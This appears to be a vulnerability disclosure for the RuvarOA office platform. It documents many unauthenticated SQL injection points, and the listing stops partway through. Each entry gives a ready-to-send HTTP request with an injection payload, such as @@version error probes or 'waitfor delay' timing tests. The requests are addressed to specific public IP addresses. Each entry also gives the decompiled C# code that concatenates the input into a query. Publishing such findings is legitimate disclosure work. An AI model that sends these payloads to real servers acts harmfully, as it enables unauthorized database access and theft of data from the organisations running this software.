Guangzhou Luhua Information Technology Co., Ltd.
http://www.ruvar.net | http://m.ruvar.com/
app="RUVAROA-Cooperative-Office-Platform" link
RuvarOA V6.01 、RuvarOA V12.01
During the code audit of the RuvarOA system, I discovered multiple vulnerabilities. Including dozens of SQL injection vulnerabilities (unauthorized in the frontend), multiple unauthorized access vulnerabilities, multiple XSS vulnerabilities, several sensitive information disclosure vulnerabilities, and one system design flaw vulnerability.
/WorkPlan/plan_template_preview.aspx
GET /WorkPlan/plan_template_preview.aspx?template_id=1+and+(select+@@version)>0+--+ HTTP/1.1
Host: 112.74.79.113:8000
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.4103.116 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,zh-HK;q=0.8,zh-TW;q=0.7,zh-CN;q=0.6,zh;q=0.5
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
function plan_template_preview within the DLL file /RuvarOA/bin/WorkPlan.dll
using System;
using System.Data;
using System.Web.UI;
using System.Web.UI.HtmlControls;
using System.Web.UI.WebControls;
using Lib;
namespace WorkPlan;
public class plan_template_preview : Page
{
protected HtmlHead Head1;
protected HtmlForm form1;
protected HtmlGenericControl divContent;
protected TextBox txt_template_formula;
protected TextBox txt_template_sumfield;
protected void Page_Load(object sender, EventArgs e)
{
DataView dataView = SqlHelper.QueryView("select top 1 * from workplan_template_info where id=" + ((Page)this).Request.QueryString["template_id"]);
if (dataView.Count > 0)
{
txt_template_formula.Text = dataView[0]["template_formula"].ToString();
txt_template_sumfield.Text = dataView[0]["template_sumfield"].ToString();
((Page)this).Title = dataView[0]["template_title"].ToString() + " -- 模版预览";
((HtmlContainerControl)divContent).InnerHtml = dataView[0]["template_content"].ToString();
}
dataView.Dispose();
}
}
The direct use of Request.QueryString["template_id"] to retrieve a value and then concatenate it into an SQL statement has resulted in an SQL injection vulnerability.
bulletin/bulletin_template_show.aspx
GET /bulletin/bulletin_template_show.aspx?id=1 HTTP/1.1
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.4103.116 Safari/537.36
Host: 112.74.79.113:8000
Accept: */*
Accept-Encoding: gzip, deflate, br
Connection: close
function bulletin_template_show within the DLL file /RuvarOA/bin/bulletin.dll
using System;
using System.Data;
using System.Web.UI;
using System.Web.UI.HtmlControls;
using System.Web.UI.WebControls;
using Lib;
namespace bulletin;
public class bulletin_template_show : Page
{
protected HtmlForm Form1;
protected HtmlGenericControl divTitle;
protected HtmlGenericControl divContent;
protected Literal lt_visible;
protected TextBox txt_id;
protected void Page_Load(object sender, EventArgs e)
{
if (!((Page)this).IsPostBack)
{
txt_id.Text = ((Page)this).Request.QueryString["id"];
if (Validate.isNullOrSpace(txt_id.Text))
{
txt_id.Text = "0";
}
DataView dataView = SqlHelper.QueryView("select top 1 * from office_bulletin_template where id=" + txt_id.Text);
if (dataView.Count > 0)
{
((HtmlContainerControl)divTitle).InnerHtml = dataView[0]["b_title"].ToString();
((HtmlContainerControl)divContent).InnerHtml = dataView[0]["b_content"].ToString();
}
dataView.Dispose();
}
}
}
The direct use of Request.QueryString["id"] to retrieve a value and then concatenate it into an SQL statement has resulted in an SQL injection vulnerability.
Mobile/WorkFlow/wf_file_download.aspx
GET /Mobile/WorkFlow/wf_file_download.aspx?attach_type=1&sys_file_storage_id=1+waitfor+delay+'0:0:3'+--+ HTTP/1.1
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.4103.116 Safari/537.36
Host: 121.33.254.78:88
Accept: */*
Accept-Encoding: gzip, deflate, br
Connection: close
function wf_file_download within the DLL file /RuvarOA/bin/Mobile.dll
public class wf_file_download : Page
{
protected void Page_Load(object sender, EventArgs e)
{
if (((Control)this).Page.IsPostBack)
{
return;
}
try
{
string text = "";
text = ((Page)this).Request.QueryString["sys_file_storage_id"];
string text2 = ((Page)this).Request.QueryString["attach_type"];
if (Validate.isNullOrSpace(text2))
{
text2 = "0";
}
if (text2 == "1")
{
string sQLString = "SELECT * FROM wf_office_file WHERE word_file_id=" + text + " ";
DataView dataView = SqlHelper.QueryView(sQLString);
if (dataView.Count > 0)
{
byte[] array = (byte[])dataView[0]["filedata"];
dataView.Dispose();
((Page)this).Response.Clear();
((Control)this).Page.Response.ContentType = "application/msword";
((Control)this).Page.Response.AddHeader("Content-Disposition", "attachment; filename=zhengwen.doc;");
((Page)this).Response.BinaryWrite(array);
}
dataView.Dispose();
return;
}
if (text != "" && text != null)
{
FileDownLoad fileDownLoad = new FileDownLoad();
fileDownLoad.DownLoad(((Control)this).Page, text);
return;
}
string text3 = "";
string text4 = "";
string text5 = "";
text3 = ((Page)this).Request.QueryString["table_id"];
text4 = ((Page)this).Request.QueryString["table_name"];
text5 = ((Page)this).Request.QueryString["upload_type"];
if (text3 != "" && text3 != null && text4 != "" && text4 != null)
{
FileDownLoad fileDownLoad = new FileDownLoad();
if (text5 == "" || text5 == null)
{
fileDownLoad.DownLoad(((Control)this).Page, text4, text3);
}
else
{
fileDownLoad.DownLoad(((Control)this).Page, text4, text3, text5);
}
}
}
catch
{
}
}
The direct use of Request.QueryString["sys_file_storage_id"] to retrieve a value and then concatenate it into an SQL statement has resulted in an SQL injection vulnerability.
But need attach_type value 1.
AddressBook/address_public_show.aspx
GET /AddressBook/address_public_show.aspx?id=1+waitfor+delay+'0:0:3'+--+ HTTP/1.1
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.4103.116 Safari/537.36
Host: 121.33.254.78:88
Accept: */*
Accept-Encoding: gzip, deflate, br
Connection: close
function address_public_show within the DLL file /RuvarOA/bin/AddressBook.dll
using System;
using System.Data;
using System.Web.UI;
using System.Web.UI.HtmlControls;
using System.Web.UI.WebControls;
using Lib;
namespace AddressBook;
public class address_public_show : Page
{
protected HtmlForm form1;
protected Literal txt_cm_name;
protected Literal txt_type_name;
protected Literal txt_cm_sez;
protected Literal txt_cm_ename;
protected Literal txt_cm_company;
protected Literal txt_cm_nameas;
protected Literal txt_cm_department_name;
protected Literal txt_cm_wife;
protected Literal txt_cm_position_name;
protected Literal txt_cm_birth;
protected Literal txt_cm_tel;
protected Literal txt_cm_fax;
protected Literal txt_cm_mobile;
protected Literal txt_cm_tel1;
protected Literal txt_cm_oicq;
protected Literal txt_cm_msn;
protected Literal txt_cm_email;
protected Literal txt_cm_email1;
protected Literal txt_cm_url;
protected Literal txt_cm_companyurl;
protected Literal txt_cm_address;
protected Literal txt_cm_companyaddr;
protected Literal txt_cm_postcode;
protected Literal txt_cm_companycode;
protected Literal txt_cm_interest;
protected Literal txt_cm_memo;
protected void Page_Load(object sender, EventArgs e)
{
Common.CheckSession();
if (!Users.Check_Power(((Page)this).Session["sn_sys_userinfo_id"].ToString(), "1092", "6"))
{
Common.DealError(((Control)this).Page, "对不起,您没有访问权限!");
((Page)this).Response.End();
}
if (!((Page)this).IsPostBack)
{
string text = ((Page)this).Request.QueryString["id"];
if (Validate.isNullOrSpace(text))
{
text = "0";
}
string sQLString = "select * from address_book where id=" + text;
DataView dataView = SqlHelper.QueryView(sQLString);
if (dataView.Count > 0)
{
txt_type_name.Text = dataView[0]["type_name"].ToString();
txt_cm_name.Text = dataView[0]["cm_name"].ToString();
txt_cm_ename.Text = dataView[0]["cm_ename"].ToString();
txt_cm_birth.Text = dataView[0]["cm_birth"].ToString();
txt_cm_sez.Text = dataView[0]["cm_sex"].ToString();
txt_cm_company.Text = dataView[0]["cm_company"].ToString();
txt_cm_department_name.Text = dataView[0]["cm_department_name"].ToString();
txt_cm_position_name.Text = dataView[0]["cm_position_name"].ToString();
txt_cm_tel.Text = dataView[0]["cm_tel"].ToString();
txt_cm_mobile.Text = dataView[0]["cm_mobile"].ToString();
txt_cm_email.Text = dataView[0]["cm_email"].ToString();
txt_cm_url.Text = dataView[0]["cm_url"].ToString();
txt_cm_address.Text = dataView[0]["cm_address"].ToString();
txt_cm_postcode.Text = dataView[0]["cm_postcode"].ToString();
txt_cm_email1.Text = dataView[0]["cm_email1"].ToString();
txt_cm_tel1.Text = dataView[0]["cm_tel1"].ToString();
txt_cm_fax.Text = dataView[0]["cm_fax"].ToString();
txt_cm_oicq.Text = dataView[0]["cm_oicq"].ToString();
txt_cm_msn.Text = dataView[0]["cm_msn"].ToString();
txt_cm_nameas.Text = dataView[0]["cm_nameas"].ToString();
txt_cm_wife.Text = dataView[0]["cm_wife"].ToString();
txt_cm_memo.Text = dataView[0]["cm_memo"].ToString();
txt_cm_interest.Text = dataView[0]["cm_interest"].ToString();
txt_cm_companyaddr.Text = dataView[0]["cm_companyaddr"].ToString();
txt_cm_companyurl.Text = dataView[0]["cm_companyurl"].ToString();
txt_cm_companycode.Text = dataView[0]["cm_companycode"].ToString();
}
dataView.Dispose();
}
}
}
The direct use of Request.QueryString["id"] to retrieve a value and then concatenate it into an SQL statement has resulted in an SQL injection vulnerability.
AddressBook/address_public_new.aspx
GET /AddressBook/address_public_new.aspx?id=1+waitfor+delay+'0:0:3'+--+ HTTP/1.1
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.4103.116 Safari/537.36
Host: 118.190.16.8:8099
Accept: */*
Accept-Encoding: gzip, deflate, br
Connection: close
function address_public_new within the DLL file /RuvarOA/bin/AddressBook.dll
using System;
using System.Data;
using System.Data.Common;
using System.Data.SqlClient;
using System.Text;
using System.Web.UI;
using System.Web.UI.HtmlControls;
using System.Web.UI.WebControls;
using Lib;
namespace AddressBook;
public class address_public_new : Page
{
protected HtmlForm form1;
protected TextBox txt_cm_name;
protected DropDownList ddl_type;
protected RadioButtonList rd_cm_sex;
protected TextBox txt_cm_ename;
protected TextBox txt_cm_company;
protected TextBox txt_cm_nameas;
protected TextBox txt_cm_department_name;
protected TextBox txt_cm_wife;
protected TextBox txt_cm_position_name;
protected TextBox txt_cm_birth;
protected TextBox txt_cm_tel;
protected TextBox txt_cm_fax;
protected TextBox txt_cm_mobile;
protected TextBox txt_cm_tel1;
protected TextBox txt_cm_oicq;
protected TextBox txt_cm_msn;
protected TextBox txt_cm_email;
protected TextBox txt_cm_email1;
protected TextBox txt_cm_url;
protected TextBox txt_cm_companyurl;
protected TextBox txt_cm_address;
protected TextBox txt_cm_companyaddr;
protected TextBox txt_cm_postcode;
protected TextBox txt_cm_companycode;
protected TextBox txt_cm_interest;
protected TextBox txt_cm_memo;
protected Button btnSave;
protected TextBox txt_id;
protected void Page_Load(object sender, EventArgs e)
{
Common.CheckSession();
if (!Users.Check_Power(((Page)this).Session["sn_sys_userinfo_id"].ToString(), "1092", "1"))
{
Common.DealError(((Control)this).Page, "对不起,您没有访问权限!");
((Page)this).Response.End();
}
if (!((Page)this).IsPostBack)
{
txt_id.Text = ((Page)this).Request.QueryString["id"];
if (Validate.isNullOrSpace(txt_id.Text))
{
txt_id.Text = "0";
}
InitType();
if (txt_id.Text != "0")
{
ShowInfo();
}
((WebControl)btnSave).Attributes["onclick"] = "return checkSave();";
}
}
private void InitType()
{
//IL_004a: Unknown result type (might be due to invalid IL or missing references)
//IL_0054: Expected O, but got Unknown
string sQLString = "select * from address_book_type where flag=0 order by type_order asc ";
DataView dataView = SqlHelper.QueryView(sQLString);
for (int i = 0; i < dataView.Count; i++)
{
((ListControl)ddl_type).Items.Add(new ListItem(dataView[i]["type_name"].ToString(), dataView[i]["id"].ToString()));
}
dataView.Dispose();
}
private void ShowInfo()
{
string sQLString = "select * from address_book where id=" + txt_id.Text;
DataView dataView = SqlHelper.QueryView(sQLString);
if (dataView.Count > 0)
{
Common.SelectedItem(ddl_type, dataView[0]["type_id"].ToString());
txt_cm_name.Text = dataView[0]["cm_name"].ToString();
txt_cm_ename.Text = dataView[0]["cm_ename"].ToString();
txt_cm_birth.Text = dataView[0]["cm_birth"].ToString();
Common.SelectedItem(rd_cm_sex, dataView[0]["cm_sex"].ToString());
txt_cm_company.Text = dataView[0]["cm_company"].ToString();
txt_cm_department_name.Text = dataView[0]["cm_department_name"].ToString();
txt_cm_position_name.Text = dataView[0]["cm_position_name"].ToString();
txt_cm_tel.Text = dataView[0]["cm_tel"].ToString();
txt_cm_mobile.Text = dataView[0]["cm_mobile"].ToString();
txt_cm_email.Text = dataView[0]["cm_email"].ToString();
txt_cm_email1.Text = dataView[0]["cm_email1"].ToString();
txt_cm_tel1.Text = dataView[0]["cm_tel1"].ToString();
txt_cm_url.Text = dataView[0]["cm_url"].ToString();
txt_cm_address.Text = dataView[0]["cm_address"].ToString();
txt_cm_postcode.Text = dataView[0]["cm_postcode"].ToString();
txt_cm_fax.Text = dataView[0]["cm_fax"].ToString();
txt_cm_oicq.Text = dataView[0]["cm_oicq"].ToString();
txt_cm_msn.Text = dataView[0]["cm_msn"].ToString();
txt_cm_nameas.Text = dataView[0]["cm_nameas"].ToString();
txt_cm_wife.Text = dataView[0]["cm_wife"].ToString();
txt_cm_memo.Text = dataView[0]["cm_memo"].ToString();
txt_cm_interest.Text = dataView[0]["cm_interest"].ToString();
txt_cm_companyaddr.Text = dataView[0]["cm_companyaddr"].ToString();
txt_cm_companyurl.Text = dataView[0]["cm_companyurl"].ToString();
txt_cm_companycode.Text = dataView[0]["cm_companycode"].ToString();
}
dataView.Dispose();
}
IF Request.QueryString["id"] value not equal 0 or null ,then go to ShowInfo() function.
The direct use of Request.QueryString["id"] to retrieve a value and then concatenate it into an SQL statement has resulted in an SQL injection vulnerability.
CorporateCulture/kaizen_download.aspx
GET /CorporateCulture/kaizen_download.aspx?file_id=')+and+(select+@@version)>0+--+(' HTTP/1.1
Host: 112.74.79.113:8000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.4103.116 Safari/537.36
function kaizen_download within the DLL file /RuvarOA/bin/CorporateCulture.dll
using System;
using System.Data.Common;
using System.Data.SqlClient;
using System.Web.UI;
using Lib;
namespace CorporateCulture;
public class kaizen_download : Page
{
protected void Page_Load(object sender, EventArgs e)
{
string text = ((Page)this).Request.QueryString["file_id"];
string text2 = "select top 1 * from kaizen_list where (file_id='" + text + "')order by file_id desc";
if (text2 != "")
{
SqlDataReader val = SqlHelper.ExecuteReader(text2);
while (((DbDataReader)(object)val).Read())
{
byte[] array = new byte[((DbDataReader)(object)val).GetBytes(12, 0L, (byte[]?)null, 0, int.MaxValue)];
((DbDataReader)(object)val).GetBytes(12, 0L, array, 0, array.Length);
((Control)this).Page.Response.ContentType = ((DbDataReader)(object)val)["file_type"].ToString();
((Control)this).Page.Response.AddHeader("Content-Disposition", "filename=" + DateTime.Now.ToString("yyyyMMddHHmmss") + ((DbDataReader)(object)val)["file_ext"].ToString() + ";");
((Control)this).Page.Response.BinaryWrite(array);
}
((DbDataReader)(object)val).Close();
}
}
}
The direct use of Request.QueryString["file_id"] to retrieve a value and then concatenate it into an SQL statement has resulted in an SQL injection vulnerability.
Mobile/Bulletin/AttachDownLoad.aspx
GET /Mobile/Bulletin/AttachDownLoad.aspx?attach_id=1')+and+(select+@@version)>0+--+(' HTTP/1.1
Host: 112.74.79.113:8000
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.4103.116 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,zh-HK;q=0.8,zh-TW;q=0.7,zh-CN;q=0.6,zh;q=0.5
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
function AttachDownLoad within the DLL file /RuvarOA/bin/Mobile.dll
using System;
using System.Data.Common;
using System.Data.SqlClient;
using System.Text;
using System.Text.RegularExpressions;
using System.Web;
using System.Web.UI;
using Lib;
namespace Mobile.Bulletin;
public class AttachDownLoad : Page
{
protected void Page_Load(object sender, EventArgs e)
{
if (((Control)this).Page.IsPostBack)
{
return;
}
try
{
string text = ((Page)this).Request.QueryString["attach_id"];
if (Validate.isNullOrSpace(text))
{
text = "0";
}
if (!(text != "") || text == null)
{
return;
}
string text2 = "";
text2 = "select top 1 file_name,file_type,file_ext,file_size,file_bin_data from office_bulletin_attach where (attach_id='" + text + "') order by attach_id desc";
if (text2 != "")
{
SqlDataReader val = SqlHelper.ExecuteReader(text2);
if (((DbDataReader)(object)val).Read())
{
string text3 = ((DbDataReader)(object)val)["file_name"].ToString();
text3 = text3.Trim();
text3 = Regex.Replace(Regex.Replace(text3, "^\"+", ""), "\"+$", "");
text3 = Regex.Replace(text3, ".[a-zA-Z0-9]*$", "");
text3 += ((DbDataReader)(object)val)["file_ext"].ToString().Replace("\"", "");
text3 = Regex.Replace(text3, "[/\\*?:\"<>]*", "");
byte[] array = new byte[((DbDataReader)(object)val).GetBytes(4, 0L, (byte[]?)null, 0, int.MaxValue)];
((DbDataReader)(object)val).GetBytes(4, 0L, array, 0, array.Length);
((Page)this).Response.Clear();
((Page)this).Response.ContentType = ((DbDataReader)(object)val)["file_type"].ToString();
((Page)this).Response.AddHeader("Content-Disposition", "attachment; filename=" + HttpUtility.UrlEncode(text3, Encoding.UTF8) + ";");
((Page)this).Response.BinaryWrite(array);
}
((DbDataReader)(object)val).Close();
}
}
catch (Exception ex)
{
((Page)this).Response.Write(ex.ToString());
}
}
}
The direct use of Request.QueryString["attach_id"] to retrieve a value and then concatenate it into an SQL statement has resulted in an SQL injection vulnerability.
Mobile/LHMail/AttachDown.aspx
GET /Mobile/LHMail/AttachDown.aspx?email_attach_id=1')+waitfor+delay+'0:0:3'+--+ HTTP/1.1
Host: 112.74.79.113:8000
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.4103.116 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,zh-HK;q=0.8,zh-TW;q=0.7,zh-CN;q=0.6,zh;q=0.5
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
GET /Mobile/LHMail/AttachDown.aspx?contentid=1')+waitfor+delay+'0:0:3'+--+ HTTP/1.1
Host: 112.74.79.113:8000
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.4103.116 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,zh-HK;q=0.8,zh-TW;q=0.7,zh-CN;q=0.6,zh;q=0.5
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
function AttachDownLoad within the DLL file /RuvarOA/bin/Mobile.dll
using System;
using System.Web.UI;
using Lib;
using WebUtility;
namespace Mobile.LHMail;
public class AttachDownLoad : BasePageInfo
{
protected void Page_Load(object sender, EventArgs e)
{
if (((Control)this).Page.IsPostBack)
{
return;
}
try
{
string text = ((Page)this).Request.QueryString["email_attach_id"];
if (Validate.isNullOrSpace(text))
{
text = "0";
}
if (text != "" && text != null)
{
FileDownLoad.DownLoadEmailAttach(int.Parse(text));
return;
}
text = ((Page)this).Request.QueryString["contentid"];
if (text != "" && text != null)
{
FileDownLoad.DownLoadEmailAttach(text);
}
}
catch
{
}
}
}
The direct use of Request.QueryString["email_attach_id"] and Request.QueryString["contentid"] to retrieve a value and then concatenate it into an SQL statement has resulted in an SQL injection vulnerability.
Mobile/WorkFlow/wf_work_finish_file_down.aspx
GET /Mobile/WorkFlow/wf_work_finish_file_down.aspx?sys_file_storage_id=1'+waitfor+delay+'0:0:3'+--+ HTTP/1.1
Host: 121.33.254.78:88
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.4103.116 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,zh-HK;q=0.8,zh-TW;q=0.7,zh-CN;q=0.6,zh;q=0.5
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
function wf_work_finish_file_down within the DLL file /RuvarOA/bin/Mobile.dll
using System;
using System.Data.Common;
using System.Data.SqlClient;
using System.Text;
using System.Web;
using System.Web.UI;
using Lib;
namespace Mobile.WorkFlow;
public class wf_work_finish_file_down : Page
{
protected void Page_Load(object sender, EventArgs e)
{
if (((Control)this).Page.IsPostBack)
{
return;
}
try
{
string dbname = ((Page)this).Request.QueryString["dbname"];
string text = "";
text = ((Page)this).Request.QueryString["sys_file_storage_id"];
BackUpDB backUpDB = new BackUpDB(dbname);
if (!(text != "") || text == null)
{
return;
}
string text2 = "";
string text3 = "";
string text4 = "";
text2 = "select top 1 * from sys_file_storage where (sys_file_storage_id='" + text + "')order by sys_file_storage_id desc";
if (!(text2 != ""))
{
return;
}
SqlDataReader val = backUpDB.QueryDataReader(text2);
while (((DbDataReader)(object)val).Read())
{
text4 = ((DbDataReader)(object)val)["file_type"].ToString();
text3 = ((DbDataReader)(object)val)["file_name"].ToString();
text3 = GetFileName(text3);
byte[] array = new byte[((DbDataReader)(object)val).GetBytes(12, 0L, (byte[]?)null, 0, int.MaxValue)];
((DbDataReader)(object)val).GetBytes(12, 0L, array, 0, array.Length);
((Control)this).Page.Response.ContentType = text4;
if (text4.IndexOf("image") > -1 || text4.IndexOf("flash") > -1)
{
((Control)this).Page.Response.AddHeader("Content-Disposition", "filename=" + HttpUtility.UrlEncode(text3, Encoding.UTF8) + ";");
}
else
{
((Control)this).Page.Response.AddHeader("Content-Disposition", "attachment; filename=" + HttpUtility.UrlEncode(text3, Encoding.UTF8) + ";");
}
((Control)this).Page.Response.BinaryWrite(array);
}
((DbDataReader)(object)val).Close();
((DbDataReader)(object)val).Dispose();
}
catch
{
}
}
private string GetFileName(string file_name)
{
int num = 0;
int num2 = 16;
string[] array = file_name.Split(new char[1] { '.' });
if (array.Length == 2)
{
num = Common.getLength(array[0]);
if (num > num2)
{
file_name = Common.getLengthEx(array[0], num2, "") + "." + array[1];
}
}
return file_name;
}
protected override void OnInit(EventArgs e)
{
InitializeComponent();
((Page)this).OnInit(e);
}
private void InitializeComponent()
{
}
}
The direct use of Request.QueryString["sys_file_storage_id"] to retrieve a value and then concatenate it into an SQL statement has resulted in an SQL injection vulnerability.
SysManage/wf_template_child_field_list.aspx
GET /SysManage/wf_template_child_field_list.aspx?template_id=@@version HTTP/1.1
Host: 112.74.79.113:8000
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.4103.116 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,zh-HK;q=0.8,zh-TW;q=0.7,zh-CN;q=0.6,zh;q=0.5
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
function wf_template_child_field_list within the DLL file /RuvarOA/bin/SysManage.dll
{
if (!((Control)this).Page.IsPostBack)
{
txt_template_id.Text = ((Page)this).Request.QueryString["template_id"];
initField();
((WebControl)btnSave).Attributes["onclick"] = "return checkSave();";
}
}
....
DataView dataView = SqlHelper.QueryView("select * from office_missive_template_child_fields where template_id=" + txt_template_id.Text);
The direct use of Request.QueryString["template_id"] to retrieve a value and then concatenate it into an SQL statement has resulted in an SQL injection vulnerability.
SysManage/sys_blogtemplate_new.aspx
GET /SysManage/sys_blogtemplate_new.aspx?id=@@version HTTP/1.1
Host: 112.74.79.113:8000
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.4103.116 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,zh-HK;q=0.8,zh-TW;q=0.7,zh-CN;q=0.6,zh;q=0.5
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
function sys_blogtemplate_new within the DLL file /RuvarOA/bin/SysManage.dll
using System;
using System.Data;
using System.Data.Common;
using System.Data.SqlClient;
using System.Text;
using System.Web.UI;
using System.Web.UI.HtmlControls;
using System.Web.UI.WebControls;
using Lib;
namespace SysManage;
public class sys_blogtemplate_new : Page
{
protected HtmlForm form1;
protected TextBox txt_blog_title;
protected Button btnSave;
protected Button btnDelete;
protected TextBox txt_blog_content;
protected TextBox txt_id;
protected void Page_Load(object sender, EventArgs e)
{
if (!((Page)this).IsPostBack)
{
txt_id.Text = ((Page)this).Request.QueryString["id"];
if (Validate.isNullOrSpace(txt_id.Text))
{
txt_id.Text = "0";
}
DataView dataView = SqlHelper.QueryView("select top 1 * from self_worklog_template where id=" + txt_id.Text);
if (dataView.Count > 0)
{
txt_blog_content.Text = dataView[0]["blog_content"].ToString();
txt_blog_title.Text = dataView[0]["blog_title"].ToString();
}
dataView.Dispose();
((WebControl)btnSave).Attributes["onclick"] = "return Check();";
((WebControl)btnDelete).Attributes["onclick"] = "return confirm('确定要删除吗?');";
}
}
The direct use of Request.QueryString["id"] to retrieve a value and then concatenate it into an SQL statement has resulted in an SQL injection vulnerability.
WebUtility/MF.aspx
POST /WebUtility/MF.aspx HTTP/1.1
Host: 112.74.79.113:8000
Content-Length: 187
Cache-Control: max-age=0
Origin: http://112.74.79.113:8000
DNT: 1
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5807.225 Safari/537.36 Edg/112.0.1791.33
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://112.74.79.113:8000/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9,zh-HK;q=0.8,zh-TW;q=0.7,zh-CN;q=0.6,zh;q=0.5
Connection: close
__VIEWSTATE=%2FwEPDwUKMTQzODQ2ODU2NGRkIOnIdBvx8FdC98ZQVziWZAsTeOJOxTvwmwGbcAdrOUw%3D&tbTable=1'+and+(select+@@version)>0+--+&tbPageID=1&btnMake=%E7%94%9F%E6%88%90%E8%AF%AD%E5%8F%A5&tbSql=
function MakeSql within the DLL file /RuvarOA/bin/WebUtility.dll
protected void Page_Load(object sender, EventArgs e)
{
if (!((Page)this).IsPostBack)
{
tbTable.Text = ((Page)this).Request.QueryString["table"];
if (tbTable.Text != "")
{
MakeSql();
}
}
}
public void MakeSql()
{
StringBuilder stringBuilder = new StringBuilder();
DataView dataView = SqlHelper.QueryView("select * from information_schema.columns where table_name='" + tbTable.Text + "' order by ORDINAL_POSITION ASC ");
for (int i = 0; i < dataView.Count; i++)
{
stringBuilder.Append(" if not exists(select * from sys_base_field where table_name='" + tbTable.Text + "' and field_name='" + dataView[i]["COLUMN_NAME"].ToString() + "') insert into sys_base_field(table_name,field_name,field_caption,field_type,field_length,field_order,field_sort,field_show,field_search) values('" + tbTable.Text + "','" + dataView[i]["COLUMN_NAME"].ToString() + "','" + dataView[i]["COLUMN_NAME"].ToString() + "','" + dataView[i]["DATA_TYPE"].ToString() + "','" + dataView[i]["CHARACTER_OCTET_LENGTH"].ToString() + "'," + (i + 10) + ",1,1,1) \n else update sys_base_field set field_type='" + dataView[i]["DATA_TYPE"].ToString() + "',field_length='" + dataView[i]["CHARACTER_OCTET_LENGTH"].ToString() + "' where table_name='" + tbTable.Text + "' and field_name='" + dataView[i]["COLUMN_NAME"].ToString() + "' \n");
}
tbSql.Text = stringBuilder.ToString();
dataView.Dispose();
}
The direct use of Request.QueryString["table"] to retrieve a value and then concatenate it into an SQL statement has resulted in an SQL injection vulnerability.
WorkFlow/wf_work_print.aspx
GET /WorkFlow/wf_work_print.aspx?idlist=@@version HTTP/1.1
Host: 112.74.79.113:8000
DNT: 1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5807.225 Safari/537.36 Edg/112.0.1791.33
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9,zh-HK;q=0.8,zh-TW;q=0.7,zh-CN;q=0.6,zh;q=0.5
Connection: close
function wf_work_print within the DLL file /RuvarOA/bin/WorkFlow.dll
public class wf_work_print : Page
{
protected HtmlGenericControl divContent;
protected void Page_Load(object sender, EventArgs e)
{
string text = ((Page)this).Request.QueryString["AutoPrint"];
